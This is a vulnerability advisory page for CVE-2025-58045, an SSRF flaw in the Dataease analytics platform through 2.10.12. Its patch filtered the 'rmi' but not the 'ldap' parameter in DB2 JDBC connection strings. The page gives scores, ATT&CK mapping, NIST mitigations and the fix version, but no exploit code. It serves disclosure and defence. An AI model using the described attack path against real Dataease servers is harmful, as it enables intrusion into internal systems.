CVE-2025-58045
Published: 15 September 2025
Summary
CVE-2025-58045 is a critical-severity SSRF (CWE-918) vulnerability in Dataease Dataease. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 16.6% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly mandates validation of information inputs like DB2 JDBC connection strings to block unfiltered 'ldap' parameters enabling SSRF.
Requires timely remediation of flaws such as the incomplete patch in Dataease up to 2.10.12 by applying updates like version 2.10.13.
Boundary protections monitor and control outbound communications to mitigate SSRF requests triggered by malicious JDBC connection strings.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Direct remote exploitation of public-facing Dataease app via incomplete JDBC connection string validation enabling SSRF.
NVD Description
Dataease is an open source data analytics and visualization platform. In Dataease versions up to 2.10.12, the patch introduced to mitigate DB2 JDBC deserialization remote code execution attacks only blacklisted the rmi parameter. The ldap parameter in the DB2 JDBC…
more
connection string was not filtered, allowing attackers to exploit the DB2 JDBC connection string to trigger server-side request forgery (SSRF). In higher versions of Java, ldap deserialization (autoDeserialize) is disabled by default, preventing remote code execution, but SSRF remains exploitable. Versions up to 2.10.12 are affected. The issue is fixed in version 2.10.13. Updating to 2.10.13 or later is recommended. No known workarounds are documented aside from upgrading.
Deeper analysisAI
CVE-2025-58045 affects Dataease, an open source data analytics and visualization platform, in versions up to 2.10.12. The vulnerability stems from an incomplete patch for prior DB2 JDBC deserialization remote code execution issues, which only blacklisted the "rmi" parameter in connection strings. The "ldap" parameter remained unfiltered, enabling attackers to manipulate DB2 JDBC connection strings and trigger server-side request forgery (SSRF), classified under CWE-918. In higher Java versions, LDAP deserialization (autoDeserialize) is disabled by default, blocking potential remote code execution but leaving SSRF viable.
Remote attackers require no privileges (AV:N/AC:L/PR:N/UI:N/S:U) to exploit this over the network with low complexity. By crafting malicious DB2 JDBC connection strings with an ldap parameter, they can force the Dataease server to make unintended requests to internal or external systems, potentially leading to high confidentiality, integrity, and availability impacts as scored at CVSS 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
The GitHub security advisory (GHSA-fmq3-6xhc-r845) and commit 77078658715bd85af5867afbfd5f1fcc37cf03c8 confirm the fix in Dataease version 2.10.13, recommending immediate upgrades to 2.10.13 or later. No workarounds are documented beyond updating.
Details
- CWE(s)